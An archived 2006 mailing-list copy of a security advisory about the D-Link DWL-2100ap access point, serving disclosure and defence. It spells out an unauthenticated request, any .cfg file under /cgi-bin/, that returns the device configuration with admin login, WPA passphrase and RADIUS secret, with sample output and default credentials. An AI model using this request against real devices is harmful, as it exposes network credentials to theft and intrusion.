Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security VulnWatch
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

[VulnWatch] Advisory - D-Link Access Point

from [news] Network Security [Permanent Link]
Subject: [VulnWatch] Advisory - D-Link Access Point
Date: Tue, 6 Jun 2006 22:09:46 -0300 (BRT) 

 INTRUDERS TIGER TEAM SECURITY - SECURITY 
ADVISORYhttp://www.intruders.com.br/http://www.intruders.org.br/ADVISORY/0206 - 
D-Link Wireless Access-Point (DWL-2100ap)PRIORITY: HIGHI - 
INTRUDERS:----------------Intruders Tiger Team Security is a project entailed 
with Security Open Source (http://www.securityopensource.org.br).The Intruders 
Tiger Team Security (ITTS) is a group of researchers with more than 10 years of 
experience, specialized in the development of intrusion projects (Pen-Test) and 
in special security projects.All the projects of intrusion (Pen-Test) realized 
until the moment by the Intruders Tiger Team Security had 100% of success.II - 
INTRODUCTION:------------------D-Link AirPlus XtremeG 2.4GHz Wireless Access 
Point, 54Mbps/108Mbps (802.11g):D-Link, the industry pioneer in wireless 
networking, introduces a performance breakthrough in wireless connectivity ? 
D-Link AirPlus Xtreme GTM series of high-speed devices now capable of 
delivering transfer rates up to 15x faster than the standard 802.11b with the 
new D-Link 108G. With the new AirPlus Xtreme G DWL-2100AP Wireless Access 
Point, D-Link sets a new standard for wireless access points.D-Link DWL-2100ap 
is one of the most popular Access Point in the world.III - 
DESCRIPTION:------------------Intruders Tiger Team Security identified during 
an intrusion project (Pen-Test) an unknown vulnerability in the Access Point 
D-Link DWL-2100ap, that allows an attacker to read device's configuration, 
without authentication with web server.Extremely sensible informations are 
avaible in the configuration of the Access Point D-Link DWL-2100ap, for 
example:- User and password used to manage the device.- Password used in WEP 
and WPA.- SSID, IP, subnet mask, MAC Address filters, etc.IV - 
ANALISYS:---------------Making a HTTP request to the /cgi-bin/ directory, the 
Web server will return error 404 (Page not found).Making a HTTP request to the 
/cgi-bin/AnyFile.htm, the Web server will return error 404 (Page not 
found).However, making a HTTP request to any file in /cgi-bin/ directory, with 
.cfg extension, will return all the device configuration.For example, making 
the following request:http://dlink-DWL-2100ap/cgi-bin/Intruders.cfgWe would 
have a result equivalent to the following:# Copyright (c) 2002 Atheros 
Communications, Inc., All Rights Reserved# DO NOT EDIT -- This configuration 
file is automatically generatedmagic Ar52xxAPfwc: 34login adminDHCPServer 
Eth_Acl nameaddrdomainsuffix IP_Addr 10.0.0.30IP_Mask 255.0.0.0Gateway_Addr 
10.0.0.1RADIUSaddr RADIUSport 1812RADIUSsecret password IntrudersTestpassphrase 
wlan1 passphrase AnewBadPassPhrase# Several lines removed.D-Link DWL-2100ap 
Access Point does not allow disable the Web server, not even has options to 
filter ports. We remember that the D-Link DWL-2100ap Access Point comes 
configured with default user /password (user:admin and no password).V. 
DETECTION:-------------Intruders Tiger Team Security confirmed the existence of 
this vulnerability in all firmwares tested, also the last version 2.10na. 
Possibly other(s) D-Link Access Point model(s) can be vulnerable also.VI. 
SUGESTION:--------------D-Link company:1 - Use strong cookies to guarantee that 
only authorized users will get access to configuration.2 - Store sensible 
configurations like password(s) using hash(s).3 - Allow create firewall 
politics and rules to filters port(s) and IP(s).4 - Request to the user change 
the default user/password on the first logon, and not allow     change the 
password to the last one used.5 - Use HTTP with SSL (HTTPS).6 - Contracts 
specialized companies in Pen-Test and security audit, aiming homologate the     
security of D-Link products.D-Link customers:1 - Upgrade the firmware of D-Link 
DWL-2100ap Access Point.     Direct link to download is 
http://www.dlinkbrasil.com.br/internet/downloads/Wireless/DWL-2100AP/DWL2100AP-firmware-v210na-r0343.tfpVII
 - CHRONOLOGY:-----------------11/02/2006 - Vulnerability discovered during a 
Pen-Test.15/02/2006 - D-Link World Wide Team Contacted.17/02/2006 - No 
response.18/02/2006 - D-Link World Wide Team re-contacted.24/02/2006 - No 
response.25/02/2006 - D-Link World Wide Team last try of contact.29/02/2006 - 
No response.29/02/2006 - D-Link Brazil Team Contacted.02/03/2006 - No 
response.03/03/2006 - D-Link Brazil Team re-contacted.06/03/2006 - D-Link 
Brazil Team responsed.09/03/2006 - Patch created.14/03/2006 - Patch added to 
D-Link Brazil download site.06/06/2006 - published advisory.VIII - 
CREDITS:---------------Wendel Guglielmetti Henrique and Intruders Tiger Team 
Security had discovered this vulnerability.Gratefulness to Glaudson Ocampos 
(Intruders Tiger Team Security), Waldemar Nehgme, JoãoArquimedes (Security Open 
Source) and Ricardo N. Ferreira (Security Open Source).Visit our 
website:http://www.intruders.com.br/http://www.intruders.org.br/
[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • [VulnWatch] Advisory - D-Link Access Point, news <=
Next by Date:  [Full-disclosure] [EEYEB-20060524] Symantec Remote Management Stack Buffer Overflow, eEye Advisories
Next by Thread:  [Full-disclosure] [EEYEB-20060524] Symantec Remote Management Stack Buffer Overflow, eEye Advisories
Indexes:  [Date] [Thread] [Top] [All Lists]